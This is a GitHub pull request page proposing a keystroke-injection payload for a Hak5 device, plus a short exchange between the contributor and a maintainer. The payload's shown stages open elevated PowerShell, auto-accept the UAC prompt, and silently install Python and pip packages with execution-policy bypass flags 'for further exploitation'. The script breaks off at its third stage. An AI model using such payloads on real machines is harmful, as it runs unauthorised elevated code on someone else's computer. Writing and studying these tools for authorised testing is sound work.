Skip to content

payloads/library/general/insyall_py3/payload.sh#71

Open
choox2738 wants to merge 2 commits intohak5:masterfrom
choox2738:master
Open

payloads/library/general/insyall_py3/payload.sh#71
choox2738 wants to merge 2 commits intohak5:masterfrom
choox2738:master

Conversation

@choox2738
Copy link

#Installs python 3 so you can have it as a way to script exploits etc.

/root/udisk/payloads/owned.txt
MATCH Regex: py_
Full Payload Contents

Title: py3 installer

Description: Install python3 for further exploitation.

Author: choox2@choo-serv.info

Date: 09/14/2024

Download and install python3 silently

Determine if 32bit or x64

Determine target name

Target IP

############################################################
MATCH py_

Q LOCK
LED SETUP
Q GUI r
Q DELAY 500
Q STRING powershell
Q CONTROL-SHIFT-ENTER
Q DELAY 2000
Q ALT y
Q DELAY 3000
Q STRING "powershell -NoP -NonI -Exec Bypass winget install python3 --disable-interactivity"
Q ENTER
C2NOTIFY INFO 'Python installation should be starting now'

Wait two minutes for python install to complete.two minutes is educated guess. 120,000 milliseconds and

set our LED status to attack

Q LED ATTACK
UNLOCK
DELAY 120000
############################################################

Next we use pip to install numpy

Q LOCK
LED STAGE2
Q GUI r
Q DELAY 500
Q STRING powershell
Q CONTROL-SHIFT-ENTER
Q DELAY 2000
Q ALT y
Q DELAY 3000
Q STRING "powershell -NoP -NonI -Exec Bypass pip install numpy"
Q ENTER
UNLOCK
C2NOTIFY INFO 'numpy installation should be starting now'
############################################################

Next we use pip to install psutil

Q LOCK
LED STAGE3

Installs python 3 so you can have it as a way to script exploits etc.
@choox2738
Copy link
Author

please provide any feed back to choox2738@gmail.com

@choox2738
Copy link
Author

Please direct comments to choox2738@gmail.com

@choox2738
Copy link
Author

Please direct comments to choox2738@gmail.com

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

this is in the wrong directory, please include a directory with your payload name and then payload.sh

payloads/library/general/insyall_py3/payload.sh

Copy link
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sorry not sure how to do that

@choox2738 choox2738 changed the title Create insyall_py3 payloads/library/general/insyall_py3/payload.sh Jun 9, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants